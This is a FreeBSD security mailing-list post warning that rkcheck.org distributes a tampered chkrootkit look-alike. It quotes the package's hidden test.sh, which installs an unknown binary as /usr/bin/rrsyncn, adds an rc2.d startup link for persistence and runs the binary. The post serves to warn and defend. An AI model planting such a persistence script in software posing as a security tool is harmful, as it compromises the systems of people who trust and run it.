has my 10.1-RELEASE system been compromised
Philip Jocks
pjlists at netzkommune.com
Wed Feb 25 21:11:40 UTC 2015
> Am 25.02.2015 um 22:07 schrieb Joseph Mingrone <jrm at ftfl.ca>:
>
> Christopher Schulte <christopher at schulte.org> writes:
>
>>> On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists at netzkommune.com> wrote:
>>>
>>> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org
>>> which was registered a few days ago and looks like a tampered version of
>>> chkrootkit. I hope, nobody installed it anywhere, it seems to execute
>>> rkcheck/tests/.unit/test.sh which contains
>>>
>>> #!/bin/bash
>>>
>>> cp tests/.unit/test /usr/bin/rrsyncn
>>> chmod +x /usr/bin/rrsyncn
>>> rm -fr /etc/rc2.d/S98rsyncn
>>> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
>>> /usr/bin/rrsyncn
>>> exit
>
> Are you looking at the tarball from the "source code" link,
> http://rkcheck.org/download.php?file=rkcheck-1.4.3-src.tar.gz?
>
> % tar -xvf rkcheck-1.4.3-src.tar.gz
> x rkcheck/
> x rkcheck/chkdirs.c
> x rkcheck/README.chklastlog
> x rkcheck/README.chkwtmp
> x rkcheck/chkutmp.c
> x rkcheck/chkrootkit
> x rkcheck/chkrootkit.lsm
> x rkcheck/check_wtmpx.c
> x rkcheck/COPYRIGHT
> x rkcheck/strings.c
> x rkcheck/ifpromisc.c
> x rkcheck/ACKNOWLEDGMENTS
> x rkcheck/chklastlog.c: truncated gzip input
> tar: Error exit delayed from previous errors.
>
> I don't see a /tests/ directory or any directory under rkcheck.
the "source code" tar is broken intentionally, I guess, so that people install the binaries. The stuff I posted was from the binary tar files which contain shell scripts etc.
Philip
More information about the freebsd-security
mailing list